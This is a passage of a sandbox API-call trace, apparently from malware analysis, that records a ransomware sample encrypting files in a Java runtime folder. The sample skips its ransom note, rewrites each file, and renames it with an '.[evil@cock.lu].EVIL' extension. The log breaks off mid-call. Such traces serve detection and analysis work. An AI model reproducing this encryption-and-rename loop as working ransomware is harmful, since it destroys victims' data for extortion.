lpFindFileData=0x84b0fddf20) returned 1 [0091.373] wcsstr (_Str="glib-lite.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0091.373] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\glib-lite.dll") returned 53 [0091.373] wcscmp (_String1="glib-lite.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0091.373] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="glib-lite.dll") returned 0x0 [0091.373] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\glib-lite.dll") returned 0x35 [0091.373] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\glib-lite.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\glib-lite.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0091.375] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x6f440, lpOverlapped=0x0) returned 1 [0091.418] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.418] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.418] _errno () returned 0x84b1160840 [0091.418] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.418] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x6f460, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x6f460, lpOverlapped=0x0) returned 1 [0091.419] CloseHandle (hObject=0x1a4) returned 1 [0091.420] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\glib-lite.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0091.420] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0091.420] __uncaught_exception () returned 0x84b1160800 [0091.420] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0091.420] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\glib-lite.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\glib-lite.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\glib-lite.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\glib-lite.dll.[evil@cock.lu].evil")) returned 1 [0091.421] ??_V@YAXPEAX@Z () returned 0x1 [0091.423] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\glib-lite.dll", dwFileAttributes=0x0) returned 0 [0091.423] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0091.423] wcsstr (_Str="gstreamer-lite.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0091.424] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\gstreamer-lite.dll") returned 58 [0091.424] wcscmp (_String1="gstreamer-lite.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0091.424] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="gstreamer-lite.dll") returned 0x0 [0091.424] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\gstreamer-lite.dll") returned 0x3a [0091.424] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\gstreamer-lite.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\gstreamer-lite.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0091.425] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x97440, lpOverlapped=0x0) returned 1 [0091.440] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.440] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.440] _errno () returned 0x84b1160840 [0091.442] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.442] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x97460, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x97460, lpOverlapped=0x0) returned 1 [0091.443] CloseHandle (hObject=0x1a4) returned 1 [0091.443] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\gstreamer-lite.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0091.446] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0091.446] __uncaught_exception () returned 0x84b1160800 [0091.446] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0091.446] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\gstreamer-lite.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\gstreamer-lite.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\gstreamer-lite.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\gstreamer-lite.dll.[evil@cock.lu].evil")) returned 1 [0091.447] ??_V@YAXPEAX@Z () returned 0x1 [0091.450] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\gstreamer-lite.dll", dwFileAttributes=0x0) returned 0 [0091.450] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0091.450] wcsstr (_Str="hprof.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0091.450] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\hprof.dll") returned 49 [0091.450] wcscmp (_String1="hprof.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0091.450] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="hprof.dll") returned 0x0 [0091.450] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\hprof.dll") returned 0x31 [0091.450] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\hprof.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\hprof.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0091.451] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x26a40, lpOverlapped=0x0) returned 1 [0091.474] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.474] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.474] _errno () returned 0x84b1160840 [0091.474] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.474] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x26a60, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x26a60, lpOverlapped=0x0) returned 1 [0091.474] CloseHandle (hObject=0x1a4) returned 1 [0091.475] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\hprof.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0091.475] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0091.475] __uncaught_exception () returned 0x84b1160800 [0091.475] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0091.475] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\hprof.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\hprof.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\hprof.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\hprof.dll.[evil@cock.lu].evil")) returned 1 [0091.475] ??_V@YAXPEAX@Z () returned 0x1 [0091.478] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\hprof.dll", dwFileAttributes=0x0) returned 0 [0091.478] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0091.478] wcsstr (_Str="instrument.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0091.478] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\instrument.dll") returned 54 [0091.478] wcscmp (_String1="instrument.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0091.478] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="instrument.dll") returned 0x0 [0091.478] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\instrument.dll") returned 0x36 [0091.478] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\instrument.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\instrument.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0091.480] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x1e240, lpOverlapped=0x0) returned 1 [0091.483] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.483] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.483] _errno () returned 0x84b1160840 [0091.483] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.483] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x1e260, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x1e260, lpOverlapped=0x0) returned 1 [0091.483] CloseHandle (hObject=0x1a4) returned 1 [0091.484] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\instrument.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0091.484] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0091.484] __uncaught_exception () returned 0x84b1160800 [0091.484] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0091.484] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\instrument.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\instrument.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\instrument.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\instrument.dll.[evil@cock.lu].evil")) returned 1 [0091.485] ??_V@YAXPEAX@Z () returned 0x1 [0091.488] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\instrument.dll", dwFileAttributes=0x0) returned 0 [0091.488] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0091.488] wcsstr (_Str="j2pcsc.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0091.488] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\j2pcsc.dll") returned 50 [0091.488] wcscmp (_String1="j2pcsc.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0091.488] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="j2pcsc.dll") returned 0x0 [0091.488] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\j2pcsc.dll") returned 0x32 [0091.488] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\j2pcsc.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\j2pcsc.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0091.491] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x4a40, lpOverlapped=0x0) returned 1 [0091.494] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.494] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.494] _errno () returned 0x84b1160840 [0091.494] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.494] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x4a60, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x4a60, lpOverlapped=0x0) returned 1 [0091.494] CloseHandle (hObject=0x1a4) returned 1 [0091.495] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\j2pcsc.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0091.495] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0091.495] __uncaught_exception () returned 0x84b1160800 [0091.495] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0091.495] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\j2pcsc.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\j2pcsc.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\j2pcsc.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\j2pcsc.dll.[evil@cock.lu].evil")) returned 1 [0091.496] ??_V@YAXPEAX@Z () returned 0x1 [0091.499] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\j2pcsc.dll", dwFileAttributes=0x0) returned 0 [0091.499] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0091.499] wcsstr (_Str="j2pkcs11.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0091.499] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\j2pkcs11.dll") returned 52 [0091.499] wcscmp (_String1="j2pkcs11.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0091.499] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="j2pkcs11.dll") returned 0x0 [0091.499] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\j2pkcs11.dll") returned 0x34 [0091.500] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\j2pkcs11.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\j2pkcs11.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0091.501] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fddcc0*=0xf840, lpOverlapped=0x0) returned 1 [0091.504] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.504] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.504] _errno () returned 0x84b1160840 [0091.504] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.504] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0xf860, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0xf860, lpOverlapped=0x0) returned 1 [0091.504] CloseHandle (hObject=0x1a4) returned 1 [0091.505] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\j2pkcs11.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0091.505] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0091.505] __uncaught_exception () returned 0x84b1160800 [0091.505] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0091.505] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\j2pkcs11.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\j2pkcs11.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\j2pkcs11.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\j2pkcs11.dll.[evil@cock.lu].evil")) returned 1 [0091.506] ??_V@YAXPEAX@Z () returned 0x1 [0091.509] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\j2pkcs11.dll", dwFileAttributes=0x0) returned 0 [0091.509] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0091.509] wcsstr (_Str="jaas_nt.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0091.509] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jaas_nt.dll") returned 51 [0091.509] wcscmp (_String1="jaas_nt.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0091.509] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="jaas_nt.dll") returned 0x0 [0091.509] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jaas_nt.dll") returned 0x33 [0091.509] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jaas_nt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jaas_nt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0091.511] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x5240, lpOverlapped=0x0) returned 1 [0091.513] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.513] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.513] _errno () returned 0x84b1160840 [0091.514] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.514] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x5260, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x5260, lpOverlapped=0x0) returned 1 [0091.514] CloseHandle (hObject=0x1a4) returned 1 [0091.514] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jaas_nt.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0091.514] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0091.514] __uncaught_exception () returned 0x84b1160800 [0091.514] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0091.514] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jaas_nt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jaas_nt.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jaas_nt.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jaas_nt.dll.[evil@cock.lu].evil")) returned 1 [0091.515] ??_V@YAXPEAX@Z () returned 0x1 [0091.517] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jaas_nt.dll", dwFileAttributes=0x0) returned 0 [0091.518] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0091.518] wcsstr (_Str="jabswitch.exe", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0091.518] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jabswitch.exe") returned 53 [0091.518] wcscmp (_String1="jabswitch.exe", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0091.518] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="jabswitch.exe") returned 0x0 [0091.518] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jabswitch.exe") returned 0x35 [0091.518] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jabswitch.exe" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jabswitch.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0091.520] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x8640, lpOverlapped=0x0) returned 1 [0091.569] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.569] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.569] _errno () returned 0x84b1160840 [0091.569] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.569] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x8660, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x8660, lpOverlapped=0x0) returned 1 [0091.570] CloseHandle (hObject=0x1a4) returned 1 [0091.570] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jabswitch.exe", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0091.570] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0091.570] __uncaught_exception () returned 0x84b1160800 [0091.570] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0091.570] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jabswitch.exe" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jabswitch.exe"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jabswitch.exe.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jabswitch.exe.[evil@cock.lu].evil")) returned 1 [0091.571] ??_V@YAXPEAX@Z () returned 0x1 [0091.574] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jabswitch.exe", dwFileAttributes=0x0) returned 0 [0091.574] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0091.574] wcsstr (_Str="java-rmi.exe", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0091.574] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\java-rmi.exe") returned 52 [0091.574] wcscmp (_String1="java-rmi.exe", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0091.574] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="java-rmi.exe") returned 0x0 [0091.574] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\java-rmi.exe") returned 0x34 [0091.574] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\java-rmi.exe" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\java-rmi.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0091.576] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x3e40, lpOverlapped=0x0) returned 1 [0091.579] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.579] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0091.579] _errno () returned 0x84b1160840 [0091.579] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, 